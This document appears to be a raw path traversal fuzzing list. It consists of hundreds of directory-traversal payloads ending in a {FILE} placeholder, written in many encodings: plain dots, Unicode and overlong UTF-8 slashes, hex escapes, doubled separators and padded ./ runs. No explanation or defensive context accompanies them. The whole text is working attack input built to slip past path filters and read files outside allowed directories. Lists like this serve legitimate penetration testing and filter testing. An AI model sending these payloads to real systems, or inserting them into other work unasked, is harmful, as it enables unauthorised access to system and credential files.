AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.../{FILE}&lt;br /&gt;
.../.../{FILE}&lt;br /&gt;
.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
...\{FILE}&lt;br /&gt;
...\...\{FILE}&lt;br /&gt;
...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
..../{FILE}&lt;br /&gt;
..../..../{FILE}&lt;br /&gt;
..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
....\{FILE}&lt;br /&gt;
....\....\{FILE}&lt;br /&gt;
....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
........................................................................../{FILE}&lt;br /&gt;
........................................................................../../{FILE}&lt;br /&gt;
........................................................................../../../{FILE}&lt;br /&gt;
........................................................................../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../../{FILE}&lt;br /&gt;
..........................................................................\{FILE}&lt;br /&gt;
..........................................................................\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
